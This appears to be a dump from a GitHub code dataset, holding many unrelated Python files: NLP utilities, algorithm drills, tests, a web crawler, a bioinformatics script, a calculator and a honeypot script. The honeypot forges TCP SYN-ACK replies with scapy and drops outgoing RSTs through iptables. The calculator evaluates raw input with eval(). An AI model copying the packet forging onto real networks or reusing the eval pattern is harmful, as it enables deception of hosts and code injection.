{}\n\n\nwith open('data/kb-mappings/bn2wn.txt') as f:\n for line in f:\n line = line.strip()\n parts = line.split('\\t')\n _bn2wn[parts[0]] = parts[2]\n _wn2bn[parts[2]] = parts[0]\n\n\ndef wn_id2bn_id(wn_id):\n return _wn2bn[wn_id]\n\n\ndef bn_id2wn_id(bn_id):\n return _bn2wn[bn_id]\n\n\n_to_bn_id_cache = {}\n\n\ndef to_bn_id(key):\n\n if key.startswith('bn:'):\n key_type = 'bn_id'\n transform = lambda x: x\n elif key.startswith('wn:'):\n key_type = 'wn_id'\n transform = lambda x: wn_id2bn_id(x)\n else:\n key_type = 'sense_key'\n transform = lambda x: to_bn_id(wn_sense_key_to_id(x).replace('s', 'a'))\n\n if key_type not in _to_bn_id_cache:\n _to_bn_id_cache[key_type] = {}\n\n if key not in _to_bn_id_cache[key_type]:\n _to_bn_id_cache[key_type][key] = transform(key)\n\n return _to_bn_id_cache[key_type][key]\n\n\nclass AnnotatedToken(NamedTuple):\n text: str\n pos: Optional[str] = None\n lemma: Optional[str] = None\n\n\nclass WSDInstance(NamedTuple):\n annotated_token: AnnotatedToken\n instance_id: Optional[str]\n labels: Optional[List[str]]\n\n\ndef read_from_raganato(\n xml_path: str,\n key_path: Optional[str] = None,\n instance_transform: Optional[Callable[[WSDInstance], WSDInstance]] = None\n) -> Iterable[Tuple[str, str, List[WSDInstance]]]:\n\n def read_by_text_iter(xml_path: str):\n\n it = ET.iterparse(xml_path, events=('start', 'end'))\n _, root = next(it)\n\n for event, elem in it:\n if event == 'end' and elem.tag == 'text':\n document_id = elem.attrib['id']\n for sentence in elem:\n sentence_id = sentence.attrib['id']\n for word in sentence:\n yield document_id, sentence_id, word\n\n root.clear()\n\n mapping = {}\n\n if key_path is not None:\n with open(key_path) as f:\n for line in f:\n line = line.strip()\n wsd_instance, *labels = line.split(' ')\n mapping[wsd_instance] = labels\n\n last_seen_document_id = None\n last_seen_sentence_id = None\n\n for document_id, sentence_id, element in read_by_text_iter(xml_path):\n\n if last_seen_sentence_id != sentence_id:\n\n if last_seen_sentence_id is not None:\n yield last_seen_document_id, last_seen_sentence_id, sentence\n\n sentence = []\n last_seen_document_id = document_id\n last_seen_sentence_id = sentence_id\n\n annotated_token = AnnotatedToken(\n text=element.text,\n pos=element.attrib.get('pos', None),\n lemma=element.attrib.get('lemma', None)\n )\n\n wsd_instance = WSDInstance(\n annotated_token=annotated_token,\n instance_id=None if element.tag == 'wf' or element.attrib['id'] not in mapping else element.attrib['id'],\n labels=None if element.tag == 'wf' or element.attrib['id'] not in mapping else mapping[element.attrib['id']]\n )\n\n if instance_transform is not None:\n wsd_instance = instance_transform(wsd_instance)\n\n sentence.append(wsd_instance)\n\n yield last_seen_document_id, last_seen_sentence_id, sentence\n\n\nclass RaganatoBuilder:\n\n def __init__(self, lang: Optional[str] = None, source: Optional[str] = None):\n self.corpus = ET.Element('corpus')\n self.current_text_section = None\n self.current_sentence_section = None\n self.gold_senses = []\n\n if lang is not None:\n self.corpus.set('lang', lang)\n\n if source is not None:\n self.corpus.set('source', source)\n\n def open_text_section(self, text_id: str, text_source: str = None):\n text_section = ET.SubElement(self.corpus, 'text')\n text_section.set('id', text_id)\n if text_source is not None:\n text_section.set('source', text_source)\n self.current_text_section = text_section\n\n def open_sentence_section(self, sentence_id: str):\n sentence_section = ET.SubElement(self.current_text_section, 'sentence')\n sentence_id = self.compute_id([self.current_text_section.attrib['id'], sentence_id])\n sentence_section.set('id', sentence_id)\n self.current_sentence_section = sentence_section\n\n def add_annotated_token(self, token: str, lemma: str, pos: str, instance_id: Optional[str] = None, labels: Optional[List[str]] = None):\n if instance_id is not None and labels is not None:\n token_element = ET.SubElement(self.current_sentence_section, 'instance')\n token_id = self.compute_id([self.current_sentence_section.attrib['id'], instance_id])\n token_element.set('id', token_id)\n self.gold_senses.append((token_id, ' '.join(labels)))\n else:\n token_element = ET.SubElement(self.current_sentence_section, 'wf')\n token_element.set('lemma', lemma)\n token_element.set('pos', pos)\n token_element.text = token\n\n @staticmethod\n def compute_id(chain_ids: List[str]) -> str:\n return '.'.join(chain_ids)\n\n def store(self, data_output_path: str, labels_output_path: str, prettify: bool = True):\n self.__store_xml(data_output_path, prettify)\n self.__store_labels(labels_output_path)\n\n def __store_xml(self, output_path: str, prettify: bool):\n corpus_writer = ET.ElementTree(self.corpus)\n with open(output_path, 'wb') as f_xml:\n corpus_writer.write(f_xml, encoding='UTF-8', xml_declaration=True)\n if prettify:\n dom = minidom.parse(output_path)\n pretty_xml = dom.toprettyxml()\n with open(output_path, 'w') as f_xml:\n f_xml.write(pretty_xml)\n\n def __store_labels(self, output_path: str):\n with open(output_path, 'w') as f_labels:\n for gold_sense in self.gold_senses:\n f_labels.write(' '.join(gold_sense))\n f_labels.write('\\n')\n\n\ndef expand_raganato_path(path: str) -> Tuple[str, str]:\n return f'{path}.data.xml', f'{path}.gold.key.txt'\n\n","repo_name":"edobobo/transformers-wsd","sub_path":"src/utils/wsd.py","file_name":"wsd.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"38458231755","text":"def bfs(s1,s2,e1,e2):\n q=[]\n visited[s1][s2]=True\n q.append((s1,s2,0))\n while q:\n s1,s2,tmp=q.pop(0)\n if s1==e1 and s2==e2:\n return tmp\n for dx,dy in [(-2,1),(-1,2),(1,2),(2,1),(2,-1),(1,-2),(-1,-2),(-2,-1)]:\n nx,ny=s1+dx,s2+dy\n\n if 0<=nxalist[i+1]:\n #temp = alist[i]\n #alist[i] = alist[i+1]\n #alist[i+1] = temp\n\n#alist = [54,26,93,17,77,31,44,55,20]\n#bubbleSort(alist)\n#print(alist)\n\n\nprint (\"############### binary sort ###########\")\nalist = [15,20,1,12,35,10]\nfor num in range(len(alist)-1,0,-1):\n for i in range(num):\n print(i)\n if alist[i]>alist[i+1]:\n temp = alist[i+1]\n alist[i+1] = alist[i]\n alist[i] = temp\nprint(alist)\nprint (\"#\"*20)\n\ndata = alist\nvalue = 15 \n\nhigh = len(data)-1\nlow = 0 \n\nflag = False\nprint (low,high)\nwhile (low<=high):\n mid = int((high+low)/2)\n print (data[mid])\n if data[mid] == value:\n print(\"found\")\n flag = True\n break\n if value < data[mid]:\n high = mid-1\n else:\n low = mid+1\nif not flag:\n print(\"not found\")\n\n\n\ndef bubblesort (data,low,high):\n value = 11\n mid = int((high+low)/2)\n if data[mid] == value:\n print(\"xfound\")\n return\n if low==high or high TrainingRepository:\n \"\"\"A fixture for a training repository.\"\"\"\n return TrainingDbRepository(database)\n\n\n@pytest.fixture\ndef coach_repo(database: Database) -> CoachRepository:\n \"\"\"A fixture for a coach repository.\"\"\"\n return CoachDbRepository(database)\n\n\n@pytest.fixture\ndef definition_repo(database: Database) -> TrainingDefinitionRepository:\n \"\"\"A fixture for a training definition repository.\"\"\"\n return TrainingDefinitionDbRepository(database)\n\n\n@pytest.fixture\ndef team_repo(database: Database) -> TeamRepository:\n \"\"\"A fixture for a team repository.\"\"\"\n return TeamDbRepository(database)\n\n\n@pytest.fixture\nasync def coach(\n database: Database, context: Context, coach_repo: CoachRepository\n) -> CoachEntity:\n \"\"\"A fixture for a coach.\"\"\"\n return await coach_repo.get_by_id(CoachIdentifier(context.get(\"coaches\")[0].id))\n\n\n@pytest.fixture\nasync def team(\n database: Database, context: Context, team_repo: TeamRepository\n) -> TeamEntity:\n \"\"\"A fixture for a team repository.\"\"\"\n teams_iterator = team_repo.get_by_ids(TeamIdentifier(context.get(\"teams\")[0].id))\n return await anext(teams_iterator)\n\n\n@pytest.fixture\nasync def command(coach: CoachEntity, team: TeamEntity) -> CreateTrainingCommand:\n \"\"\"A fixture for a training entity.\"\"\"\n start_date = LocalTimestamp.create_now()\n return CreateTrainingCommand(\n start_date=str(start_date),\n end_date=str(start_date.add_delta(hours=1)),\n active=True,\n cancelled=False,\n location=\"\",\n texts=[\n TextCommand(\n locale=\"en\",\n format=\"md\",\n title=\"Test training\",\n content=\"This is a test\",\n summary=\"This is a test\",\n )\n ],\n coaches=[Coach(id=coach.id.value, head=True, present=False, payed=False)],\n teams=[team.id.value],\n definition=None,\n remark=\"Created with test_create_training\",\n )\n\n\nasync def test_create_training(\n command: CreateTrainingCommand,\n training_repo: TrainingRepository,\n definition_repo: TrainingDefinitionRepository,\n coach_repo: CoachRepository,\n team_repo: TeamRepository,\n owner: Owner,\n):\n \"\"\"Test the use case \"Create Training\".\"\"\"\n training = await CreateTraining(\n training_repo, definition_repo, coach_repo, team_repo, owner\n ).execute(command)\n\n assert training is not None, \"There should be a training\"\n","repo_name":"fbraem/kwai","sub_path":"backend/src/tests/modules/training/test_create_training.py","file_name":"test_create_training.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"73716645262","text":"import time\n\nfrom simpleai.search import astar, greedy\n\nfrom cython_custom import Coordinate\nfrom cython_path_search import RoutePlanningProblem\n\nif __name__ == '__main__':\n time_start = time.time()\n\n map_info = (199, 199, 10)\n buildings = [(1, 1, 198, 199, 0, 10)]\n start = (0, 0, 0)\n end = (199, 199, 10)\n\n result = None\n count = 1\n\n problem = RoutePlanningProblem(\n map_info=map_info,\n buildings=buildings)\n for _ in range(count):\n problem.set_config(start=Coordinate(*start), end=Coordinate(*end))\n result = astar(problem, graph_search=True)\n\n time_end = time.time()\n\n path = [(c.x, c.y, c.z) for (_, c) in result.path()]\n print(result.state)\n print(path)\n print('Time: %s s' % ((time_end - time_start) / count))\n","repo_name":"Boreaso/HikvisionChallenge","sub_path":"jpsp_boost/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13016079939","text":"#!/usr/local/bin/python3\r\nimport os\r\nfrom scapy import all\r\nfrom scapy.all import *\r\ndef packetcraft():\r\n print(\"Begining packet crafting:\")\r\n while True:\r\n os.system(\"iptables-legacy -A OUTPUT -p tcp -o eth0 --sport 1:65535 --tcp-flags RST RST -j DROP\")\r\n def packet(pkt):\r\n if pkt[TCP].flags == 2:\r\n if(str(pkt[TCP].dport)) == 22:\r\n print(\"SYN packet detected port : \" + str(pkt[TCP].sport) + \" from IP Src : \" + pkt[IP].src)\r\n send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='SA'))\r\n elif(str(pkt[TCP].dport)) == \"445\":\r\n print(\"SYN packet detected port : \" + str(pkt[TCP].sport) + \" from IP Src : \" + pkt[IP].src)\r\n send(IP(dst=pkt[IP].src, src=pkt[IP].dst)/TCP(dport=pkt[TCP].sport, sport=pkt[TCP].dport,ack=pkt[TCP].seq + 1, flags='SA'))\r\n sniff(iface=\"eth0\", prn=packet, filter=\"tcp[0xd]&18=2\",count=10)\r\n os.system(\"iptables-legacy -D OUTPUT -p tcp -o eth0 --sport 1:65535 --tcp-flags RST RST -j DROP\")\r\n \r\ndef logports():\r\n print(\"Starting T-Shark capture on ports 22 and 445:\")\r\n os.system(\"sudo tshark -i eth0 -c 10 -f \\\"port 22 or port 445\\\" -w /home/capture/mycapt.pcap -F libpcap\")\r\n print(\"T-Shark is now running\")\r\n \r\ndef main():\r\n print(\"Starting HoneyPot Script\")\r\n logports()\r\n packetcraft()\r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main()\r\n except KeyboardInterrupt:\r\n print('Exiting as user request...')","repo_name":"1md3nd/H0n3yP0t","sub_path":"capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"295540774","text":"#!/usr/bin/env python3\nimport sys\nimport re\nfrom re import finditer\n\nsequences = []\n\n\ntry:\n if len(sys.argv) == 3:\n inputFile = sys.argv[1]\n outputFile = sys.argv[2]\n else:\n raise TypeError\nexcept:\n sys.exit('Reikia įvesti dviejų failų pavadinimus')\n\n# Visos sekos vienodo ilgio, inicializuojame sąrašus nuliais\ndef calculateFrequencies(sequences):\n sequenceLength = len(sequences[0])\n frequencyMatrix = {\n 'A' : [0] * sequenceLength,\n 'C' : [0] * sequenceLength,\n 'G' : [0] * sequenceLength,\n 'T' : [0] * sequenceLength\n }\n for sequence in sequences:\n # Enumeracija padeda lengvai pasiekti kiekvieną sekos elementą\n for index, nucleotide in enumerate(sequence):\n frequencyMatrix[nucleotide][index] += 1\n return frequencyMatrix\n\ndef findConsensus(sequenceLength, frequencyMatrix):\n consensus = \"\"\n # Skaičiuojami iš dažnio matricos, kuris nukleotidas kiekvienoje vietoje \n # pasikartoja dažniausiai\n for i in range(sequenceLength):\n maxFrequency = -1\n mostFrequentNucleotide = None\n for nucleotide in \"ATGC\":\n # Kiekvieną lyginame su dažniausiai pasikartojusiu skaičiumi\n if frequencyMatrix[nucleotide][i] > maxFrequency:\n maxFrequency = frequencyMatrix[nucleotide][i]\n mostFrequentNucleotide = nucleotide\n # Jei yra daugiau nei vienas dažniausiai pasiakrtojantis\n # pagal sąlygą rašomas - simbolis (nepavyko identifikuoti)\n elif frequencyMatrix[nucleotide][i] == maxFrequency:\n mostFrequentNucleotide = '-'\n # Sudaroma labiausiai tikėtina protėvio seka iš dažniausiai \n # pasikartojusių nukleotidų\n consensus += mostFrequentNucleotide\n return consensus\n\n\ntry:\n with open(inputFile, 'r', encoding = 'utf-8') as input:\n for match in finditer(r'^>.*$([^>]+)', input.read(), re.M | re.I):\n # Ištriname eilučių skirtukus\n sequence = match.group(1).replace('\\n', '')\n sequences.append(sequence)\n frequencyMatrix = calculateFrequencies(sequences)\n consensus = findConsensus(len(sequences[0]), frequencyMatrix)\n with open(outputFile, 'w') as output:\n output.write(consensus)\n\nexcept FileNotFoundError:\n sys.exit(\"Įvesties failas neegzistuoja\")\n\n","repo_name":"DaliaMasilionyte/Bioinf-varzybos","sub_path":"7uzdavinys/7uzdavinys.py","file_name":"7uzdavinys.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"lt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23792316787","text":"\"\"\"\ncode for reading different file formats\noutput are generators with dictionaries\n\"\"\"\n\nfrom os.path import splitext\n\nimport hashlib\nimport codecs\n\n\ndef open_file(file_name):\n \"\"\"\n returns a pair with the md5 of the file, and fitting generator for\n iterating the file.\n \"\"\"\n #head,ext = splitext(file_name)\n md5 = hashlib.md5()\n #print head, ext\n with open(file_name,'rb') as f: \n for chunk in iter(lambda: f.read(128*md5.block_size), b''): \n md5.update(chunk)\n \n #print md5.hexdigest()\n if file_name.endswith(\".gt\"):\n return (md5.hexdigest(), gt_generator(file_name))\n elif file_name.endswith(\".egt\"):\n return (md5.hexdigest(), egt_generator(file_name))\n \ndef gt_generator(file):\n with codecs.open(file, \"r\", \"utf-8\") as f:\n for line in f:\n tmp = line.split()\n yield {\"loc\" : [float(tmp[1]), float(tmp[2])],#[lon, lat]\n \"tag\" : tmp[3:]}\n\ndef egt_generator(file):\n with codecs.open(file, \"r\", \"utf-8\") as f:\n for line in f:\n tmp = line.split()\n yield {\"loc\" : [float(tmp[1]), float(tmp[2])],\n \"id\" : int(tmp[3]),\n \"tag\" : tmp[4:]}\n","repo_name":"cseyda/Master-thesis","sub_path":"code/Python/file_input.py","file_name":"file_input.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"865387689","text":"#encoding='utf-8'\n\nimport json\nimport os\nimport pickle as pkl\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nfrom utils import IdMap\n\nbase_url = 'http://cc.nankai.edu.cn'\ncur = 'http://cc.nankai.edu.cn'\ndoc_id_map = IdMap.IdMap() # doc to id\nmax_loop = 100\nnxt = []\ntot = 0\nurl_anc_map = {} # url to anctext\nurl_id_map = IdMap.IdMap() # url to id\nurl_list_map = {} # page link info\n\ndef get_html(url):\n # print(\"try to get: \", url)\n try:\n temp = requests.get(url, timeout=2)\n temp.encoding = 'utf-8'\n except:\n return None\n return temp\n\ndef write_result(html):\n soup = BeautifulSoup(html.text, 'lxml')\n addr = url_id_map.__getitem__(cur)\n # add code\n doc = open(os.path.join('data_dir', str(addr) + '.code'), 'w', encoding='utf-8')\n doc.write(html.text)\n doc.close()\n # url and anctext\n data = soup.select('a')\n pages = set()\n # url_anc.write(\"+++ now is : \" + cur + \"\\n\")\n for item in data:\n text = re.sub(\"[\\r \\n\\t]\", '', item.get_text())\n if text == None or text == '':\n continue\n url = item.get('href')\n if url == None or url == '' or re.search('java|void', url) != None:\n continue\n # add header\n if re.search('\\.cn|\\.com', url) == None:\n if re.match('http|https|www\\.', url) == None:\n if re.match('\\/', url) == None:\n url = '/' + url\n url = base_url + url\n if not re.search('\\.doc|\\.docx|\\.zip|\\.rar|\\.ppt|\\.pptx|\\.xlsx|\\.xls|\\.jpg|\\.png|\\.pdf|\\.md', url) == None \\\n or re.search('file|download', url) != None:\n if doc_id_map.__have__(url) == None:\n docid = doc_id_map.__getitem__(url)\n url_anc_map.setdefault(url, text)\n doc_url.write(text + \" \" + str(docid) + \"\\n\")\n continue\n if url_id_map.__have__(url) == None:\n urlid = url_id_map.__getitem__(url)\n nxt.append(url)\n url_anc.write(text + \" \" + str(urlid) + \"\\n\")\n url_anc_map.setdefault(url, text)\n urlid = url_id_map.__getitem__(url)\n pages.add(urlid)\n url_list_map.setdefault(url_id_map.__getitem__(cur), pages)\n # context\n doc = open(os.path.join('data_dir', str(addr) + '.info'), 'w', encoding='utf-8')\n data = soup.select('head')\n for item in data:\n text = re.sub('[\\r \\n\\t]', '', item.get_text())\n if text == None or text == '':\n continue\n doc.write(text)\n data = soup.select('body')\n for item in data:\n text = re.sub('[\\r \\n\\t]', '', item.get_text())\n if text == None or text == '':\n continue\n doc.write(text)\n doc.close()\n\nif __name__ == \"__main__\":\n url_anc = open(os.path.join('spider', 'url_anc.txt'), 'w', encoding='utf-8')\n doc_url = open(os.path.join('spider', 'doc_url.txt'), 'w', encoding='utf-8')\n while max_loop > 0 or len(nxt) > 0:\n # fetch\n html = get_html(cur)\n if html == None:\n print(\"xxx fetch \", cur, \" failed, drop\")\n while True:\n cur = nxt[0]\n nxt.remove(cur)\n if re.search(\"nankai\", cur) == None:\n continue\n if not re.search(\"\\.cn|\\.com\", cur) == None:\n break\n continue\n real_url = html.url\n if re.search('nankai', real_url) == None:\n print(\"xxx wrong url \", real_url, \", drop\")\n while True:\n cur = nxt[0]\n nxt.remove(cur)\n if re.search(\"nankai\", cur) == None:\n continue\n if not re.search(\"\\.cn|\\.com\", cur) == None:\n break\n continue\n # write\n if not re.search('\\.doc|\\.docx|\\.zip|\\.rar|\\.ppt|\\.pptx|\\.xlsx|\\.xls|\\.jpg|\\.png|\\.pdf|\\.md', real_url) == None \\\n or re.search('file|download', real_url) != None:\n anc = url_anc_map.get(cur)\n if anc != None:\n print(\"+++ document \", real_url)\n if doc_id_map.__have__(real_url) == None:\n docid = doc_id_map.__getitem__(real_url)\n doc_url.write(anc + \" \" + str(docid) + \"\\n\")\n else:\n # add cur url\n if url_id_map.__have__(cur) == None:\n url_id_map.__getitem__(cur)\n write_result(html)\n tot = tot + 1\n print('@', tot, ' ', cur, ': ', len(nxt))\n while True:\n cur = nxt[0]\n nxt.remove(cur)\n if re.search(\"nankai\", cur) == None:\n continue\n if not re.search(\"\\.cn|\\.com\", cur) == None:\n break\n base_url = cur[:re.search(\"\\.cn|\\.com\", cur).span()[1]]\n if max_loop > 0:\n max_loop = max_loop - 1\n if tot == 20000:\n break\n doc_url.close()\n url_anc.close()\n # save pages link\n # print(url_list_map)\n doc = open(os.path.join('data_out', 'url_list.dict'), 'wb')\n pkl.dump(url_list_map, doc)\n doc.close()\n doc = open(os.path.join('data_out', 'url_id.dict'), 'wb')\n pkl.dump(url_id_map, doc)\n doc.close()\n doc = open(os.path.join('data_out', 'doc_id.dict'), 'wb')\n pkl.dump(doc_id_map, doc)\n doc.close()\n # print(url_list_map)\n print(\"FINISH\")","repo_name":"Emanual20/IR-hw6-Web-Search-Engine","sub_path":"spideryy.py","file_name":"spideryy.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"71641177102","text":"#!/usr/bin/env python\n\n# Lightly modified from: https://www.simplifiedpython.net/python-calculator/ with\n# the help of the pyright LSP server. The Arch system Python had had tkinter module\n# but the tk and tcl Pacman packages also needed to be installed.\n\nimport tkinter\n\nYES = tkinter.YES\nBOTH = tkinter.BOTH\nLEFT = tkinter.LEFT\nTOP = tkinter.TOP\nRIDGE = tkinter.RIDGE\n\nFrame = tkinter.Frame\nButton = tkinter.Button\nStringVar = tkinter.StringVar\nEntry = tkinter.Entry\n \ndef iCalc(source, side):\n storeObj = Frame(source, borderwidth=4, bd=4, bg=\"powder blue\")\n storeObj.pack(side=side, expand = YES, fill = BOTH)\n return storeObj\n \ndef button(source, side, text, command):\n storeObj = Button(source, text=text, command=command)\n storeObj.pack(side=side, expand = YES, fill= BOTH)\n return storeObj\n \nclass app(Frame):\n def __init__(self):\n Frame.__init__(self)\n self.option_add('*Font', 'arial 20 bold')\n self.pack(expand = YES, fill = BOTH)\n \n display = StringVar()\n Entry(self, relief=RIDGE, textvariable=display, justify='right',\n bd=30, bg=\"powder blue\").pack(side=TOP, expand=YES, fill = BOTH)\n \n for clearButton in ([\"C\"]):\n erase = iCalc(self, TOP)\n for ichar in clearButton:\n button(erase, LEFT, ichar, lambda storeObj=display, _=ichar: storeObj.set(''))\n \n for numButton in (\"789/\", \"456*\", \"123-\", \"0.+\"):\n FunctionNum = iCalc(self, TOP)\n for iEquals in numButton:\n button(FunctionNum, LEFT, iEquals,\n lambda storeObj=display, q=iEquals: storeObj.set(storeObj.get() + q))\n \n EqualButton = iCalc(self, TOP)\n for iEquals in \"=\":\n if iEquals == '=':\n btniEquals = button(EqualButton, LEFT, iEquals, None)\n btniEquals.bind('',\n lambda _,s=self, storeObj=display: s.calc(storeObj),\n '+')\n else:\n btniEquals = button(EqualButton, LEFT, iEquals,\n lambda storeObj=display, s=' %s ' % iEquals:\n storeObj.set(storeObj.get() + s))\n \n def calc(self, display):\n try:\n display.set(eval(display.get()))\n except:\n display.set(\"ERROR\")\n\nif __name__=='__main__':\n app().mainloop()\n","repo_name":"grscheller/scheller-linux-archive","sub_path":"grok/Python/calculator/simpleTkCalc.py","file_name":"simpleTkCalc.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"30267980680","text":"#!/usr/bin/python3\ndef max_integer(my_list=[]):\n \"\"\"Find the biggest integer of a list.\"\"\"\n # Check if the list is empty\n if len(my_list) == 0:\n # Return None if the list is empty\n return None\n \n # Initialize the maximum value to the first element of the list\n max_value = my_list[0]\n \n # Iterate over the remaining elements of the list\n for num in my_list[1:]:\n # Compare each element with the current maximum value\n if num > max_value:\n # If the current element is greater, update the maximum value\n max_value = num\n \n # Return the maximum value\n return max_value\n","repo_name":"Sentense1/alx-higher_level_programming","sub_path":"0x03-python-data_structures/9-max_integer.py","file_name":"9-max_integer.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15443969113","text":"\nimport pytest\nimport task_18_2b\nimport sys\n\nsys.path.append(\"..\")\n\nfrom pyneng_common_functions import check_function_exists\n\n\ncorrect_return_value = (\n {\n \"ip http server\": \"config term\\n\"\n \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n \"R1(config)#ip http server\\n\"\n \"R1(config)#\",\n \"logging buffered 20010\": \"config term\\n\"\n \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n \"R1(config)#logging buffered 20010\\n\"\n \"R1(config)#\",\n },\n {\n \"a\": \"config term\\n\"\n \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n \"R1(config)#a\\n\"\n '% Ambiguous command: \"a\"\\n'\n \"R1(config)#\",\n \"logging\": \"config term\\n\"\n \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n \"R1(config)#logging\\n\"\n \"% Incomplete command.\\n\"\n \"\\n\"\n \"R1(config)#\",\n \"logging 0255.255.1\": \"config term\\n\"\n \"Enter configuration commands, one per line. End with CNTL/Z.\\n\"\n \"R1(config)#logging 0255.255.1\\n\"\n \" ^\\n\"\n \"% Invalid input detected at '^' marker.\\n\"\n \"\\n\"\n \"R1(config)#\",\n },\n)\n\n\ndef test_functions_created():\n \"\"\"\n Тестуємо, що функцію створено\n \"\"\"\n check_function_exists(task_18_2b, \"send_config_commands\")\n\n\ndef test_function_return_value(capsys, first_router_from_devices_yaml):\n \"\"\"\n Перевірка роботи функції\n \"\"\"\n commands_with_errors = [\"logging 0255.255.1\", \"logging\", \"a\"]\n correct_commands = [\"logging buffered 20010\", \"ip http server\"]\n test_commands = commands_with_errors + correct_commands\n\n return_value = task_18_2b.send_config_commands(\n first_router_from_devices_yaml, test_commands, log=False\n )\n\n # проверяем возвращаемое значение\n assert return_value != None, \"Функція нічого не повертає\"\n assert type(return_value) == tuple, \"Функція має повертати кортеж\"\n assert 2 == len(return_value) and all(\n type(item) == dict for item in return_value\n ), \"Функція має повертати кортеж із двома словниками\"\n correct_good, correct_bad = correct_return_value\n return_good, return_bad = return_value\n assert (\n correct_good.keys() == return_good.keys()\n ), \"Функція повертає неправильне значення для словника з командами без помилок\"\n assert (\n correct_bad.keys() == return_bad.keys()\n ), \"Функція повертає неправильне значення для словника з командами з помилками\"\n\n\n@pytest.mark.parametrize(\n \"error,command\",\n [\n (\"Invalid input detected\", \"logging 0255.255.1\"),\n (\"Incomplete command\", \"logging\"),\n (\"Ambiguous command\", \"a\"),\n ],\n)\ndef test_function_stdout(error, command, capsys, first_router_from_devices_yaml):\n return_value = task_18_2b.send_config_commands(\n first_router_from_devices_yaml, [command], log=False\n )\n\n stdout, err = capsys.readouterr()\n ip = first_router_from_devices_yaml[\"host\"]\n assert error in stdout, \"У повідомленні про помилку немає самої помилки\"\n assert command in stdout, \"У повідомленні про помилку немає команди, що виконується\"\n assert ip in stdout, \"У повідомленні про помилку немає IP-адреси пристрою\"\n","repo_name":"AndyMiga/PyNEngUkr_2023_My_Tasks","sub_path":"exercises/18_ssh_telnet/test_task_18_2b.py","file_name":"test_task_18_2b.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"13398156719","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 7 22:52:59 2021\n\n@author: grogroda\n\"\"\"\n\nimport NetworkGeneration as ng\nfrom matplotlib import pyplot as plt\nimport time\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport multiprocessing as mp\n\n'''\nThis code will be used to test and analyse data from the TN_model_generate function\nof the NetworkGeneration.py module. This version of the code uses a module called\nmultiprocessing, which I'm using here purely to make the code run faster. As\nyou will notice, both codes work, but since I wanted to simulate very big networks\na huge number of times, I needed to adapt the code to run it in a cluster, that's\nwhy I'm making a separate code here in case you want to work with a more efficient\nversion of the analysis code.\n'''\n\ndef simular(n, alpha_A, alpha_G, N):\n '''\n This will create n networks with the TN_model, using the parameters shown,\n and print the graph of p(e) x e where p(e) is the probability to find a node \n with energy e in the final network.\n '''\n \n cores=mp.cpu_count()\n pool=mp.Pool(processes=cores)\n energies=[]\n pool_list=[]\n \n for i in range(n):\n p=pool.apply_async(ng.TN_model_generate, (alpha_A, alpha_G, N))\n pool_list.append(p)\n #print('Simulation', 100*len(pool_list)/n, '% completed!')\n \n networks=[p.get() for p in pool_list]\n \n for nk in networks:\n energies+=[node.weight for node in nk.nodes]\n \n return energies\n\ndef analisar(energy_list, bins, q_fit=False): \n \n #REVIEW AND FIX THIS PART OF THE CODE!¨\n \n start, finish=min(energy_list), max(energy_list)\n bins_list=list(np.logspace(np.log(start), np.log(finish), num=bins))\n hist, edges=np.histogram(energy_list, bins=bins_list, density=True)\n hist_list=list(hist)\n hist_list.append(1/len(energy_list))\n \n if q_fit==True:\n \n def q_dist(x, q, bq, Z):\n \n return 1/Z*(1-bq*(1-q)*x)**(1/(1-q))\n \n parameters, cov_matrix=curve_fit(q_dist, bins_list, hist_list)\n q=parameters[0]\n bq=parameters[1]\n Z=parameters[2]\n \n print(len(bins_list), len(hist_list))\n plt.scatter(bins_list, hist_list, c='k')\n if q_fit==True:\n plt.plot(bins_list, [1/Z*(1-bq*(1-q)*x)**(1/(1-q)) for x in bins_list])\n print('Z=', Z, ', q=', q, ' & \\u03B2=', bq)\n print('Covariance Matrix:')\n print(cov_matrix)\n \n plt.xlim((0.000005, 50))\n plt.ylim((0.000008, 10))\n plt.xscale('log')\n plt.yscale('log')\n plt.xlabel('\\u03B5')\n plt.ylabel('P(\\u03B5)')\n plt.show()\n \nif __name__=='__main__':\n t0=time.time()\n energies=simular(100, 2, 1, 1000)\n analisar(energies, 100, q_fit=False)\n print('Execution time:', time.time()-t0)","repo_name":"kiq316/Fractal-Systems-Project","sub_path":"Codes/TN_analyseMP.py","file_name":"TN_analyseMP.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71541276624","text":"import netfilterqueue\nimport typer\nfrom netfilterqueue 